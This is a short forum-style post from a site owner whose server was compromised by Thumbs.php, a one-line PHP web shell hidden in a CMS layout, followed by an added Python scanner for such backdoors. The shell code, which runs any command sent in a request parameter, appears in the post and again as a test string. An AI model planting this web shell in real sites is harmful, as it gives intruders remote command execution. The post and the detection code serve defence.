Yesterday someone sent me the layout for the CMS and I uploaded it to my server. Included in the layout was a backdoor file, Thumbs.php, which contains:
<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>
It seems to me that this is exactly a backdoor:
This person executed the script via adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory.
I have ISPConfig 220.127.116.11. Why did rkhunter not block this backdoor?
I thought these programs, together with ISPConfig, would protect me from the backdoor.
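An added example, not part of the original post: a small check to run over an unpacked layout before uploading it, which flags PHP files placed in asset directories such as img/ and any call that passes request input to a command-execution function, as the Thumbs.php above does. The function names, the directory and extension lists and the clean sample are assumptions made for illustration.

```python
import os
import re

# PHP functions that run OS commands or evaluate code.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# Request-controlled superglobals.
USER_INPUT = r"\$_(?:REQUEST|GET|POST|COOKIE|SERVER)\b"
# An exec-style call whose argument list mentions request input.
EXEC_ON_INPUT = re.compile(r"@?\b" + EXEC_FUNCS + r"\s*\([^;]*?" + USER_INPUT, re.I | re.S)
PHP_TAG = re.compile(r"<\?(?:php|=|\s)", re.I)
PHP_EXT = (".php", ".phtml", ".php5", ".phar")
ASSET_DIRS = {"img", "images", "css", "js", "fonts", "uploads"}


def scan_text(path, text):
    """Return the list of reasons a file looks like a web shell."""
    reasons = []
    parts = {p.lower() for p in path.replace("\\", "/").split("/")[:-1]}
    is_php = path.lower().endswith(PHP_EXT)
    if is_php and parts & ASSET_DIRS:
        reasons.append("php-file-in-asset-directory")
    if not is_php and PHP_TAG.search(text):
        reasons.append("php-code-in-non-php-file")
    if EXEC_ON_INPUT.search(text):
        reasons.append("command-execution-on-request-input")
    return reasons


def scan_tree(root):
    """Walk an unpacked layout/theme and map each suspicious file to its reasons."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="latin-1") as fh:
                text = fh.read(1_000_000)  # web shells are small; cap the read
            reasons = scan_text(os.path.relpath(full, root), text)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings


# The file from the post, plus a constructed harmless template for contrast.
THUMBS = '<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>'
CLEAN = '<?php echo htmlspecialchars($title); ?>'

if __name__ == "__main__":
    print(scan_text("layout/layoutname/img/Thumbs.php", THUMBS))
    print(scan_text("layout/layoutname/index.php", CLEAN))
```

Pattern matching like this catches only plain, unobfuscated shells; not allowing the web server to execute PHP from image and upload directories covers the cases it misses.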